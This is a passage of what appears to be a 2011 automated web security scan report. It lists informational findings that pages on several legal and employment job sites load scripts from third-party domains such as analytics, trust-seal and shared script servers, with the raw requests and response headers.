https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES

Request

GET /article/6070/Brooklyn-Law-School/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:46 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vl8einafm1n540cl32q4l331g3; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144794

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td valign="top"><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>

           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.369. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/article/6154/Anne-Healy-LIDS/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.jdjournal.com/script/ajax.js
http://www.jdjournal.com/script/functions.js
http://www.statcounter.com/counter/frames.js
https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES

Request

GET /article/6154/Anne-Healy-LIDS/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:39 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kn84m4kfq0k9i5413blcf4rdv5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144589

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td valign="top"><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>

           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.370. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/images/banner/lc_bannerforjdj125x125.gif/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.jdjournal.com/script/ajax.js
http://www.jdjournal.com/script/functions.js
http://www.statcounter.com/counter/frames.js
https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES

Request

GET /images/banner/lc_bannerforjdj125x125.gif/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:41:09 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d2dplbacjvjkr67gtesru8aj04; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103110

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...

           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>

           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.371. http://www.lawcrossing.com/lcjssearchresults.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/lcjssearchresults.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.statcounter.com/counter/frames.js

Request

GET /lcjssearchresults.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e5iouh0ohr4puh7rj3ce3m03n5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 92150

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td width="100%" align="center" height="80">
               <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>

           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.372. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/salarysurvey/lcsalarysurvey.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.jdjournal.com/script/ajax.js
http://www.jdjournal.com/script/functions.js
http://www.statcounter.com/counter/frames.js
https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES

Request

GET /salarysurvey/lcsalarysurvey.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:29:48 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ru8l85l763haf7r7bf41h50d6; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103222

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...

           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>

           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.373. http://www.lawfirmstaff.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawfirmstaff.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.lawfirmstaff.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=egea78a3rqgqf8pr582hmugbv0; path=/; domain=www.lawfirmstaff.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27468

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Law Firm Placement, Legal Staff, Law Firm Jobs, Legal Placement - Law Firm S
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Law Firm Staff Jobs RSS Feed" href="http://www.lawfirmstaff.com/lfsrssjobs.php" target="_blank" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<br><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

15.374. http://www.lawschoolloanreport.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawschoolloanreport.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.lawschoolloanreport.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=nivvn9c4qv4ger2d748thpv5d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10640

<html>
<head>
    <TITLE>Student Loan Report, Student Aid Report, Student Financial Aid Report, Federal Student Aid Report . Law School Loan Report</TITLE>
   <meta name="Description" content="Law School
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

15.375. http://www.lawschoolloans.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawschoolloans.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:18 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=e93dd05f80eebb1753b70ce5d0a8fbb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 226477

<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws_scroll.js"></scrip
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...


<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.376. https://www.lawschoolloans.com/lslprivateloan_application.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lawschoolloans.com
Path:	/lslprivateloan_application.php

Issue detail

The response dynamically includes the following script from another domain:

https://seal.godaddy.com/getSeal?sealID=1700332279059004dc41012009ff0cfd57e8594241035641441859611

Request

GET /lslprivateloan_application.php HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.377. http://www.legalauthority.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.legalauthority.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://srvr19.pdcsrvr.com/vsa/callagent.php?cid=1
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/; domain=.legalauthority.com
Set-Cookie: LA_RUSH_ORDER=deleted; expires=Thu, 21-Jan-2010 19:41:21 GMT; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 130129

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Legal Resume Consultant, Legal Job Search, Sample Attorney Resume, Legal S
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://srvr19.pdcsrvr.com/vsa/callagent.php?cid=1"></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.378. http://www.legalauthority.com/signup.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.legalauthority.com
Path:	/signup.php

Issue detail

The response dynamically includes the following script from another domain:

http://srvr19.pdcsrvr.com/vsa/callagent.php?cid=1

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.379. http://www.logisticscrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.logisticscrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bge253g268slkfifh0ptl28dv1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.380. http://www.managercrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.managercrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=346sk676v0frg7f966ahgna1s4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128519

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.381. http://www.manufacturingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manufacturingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ot5i4vicpofvo6i92rqjh7uc5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121467

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.382. http://www.marketingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:40 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=mv80mss0p40gngko1vhkar5f43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
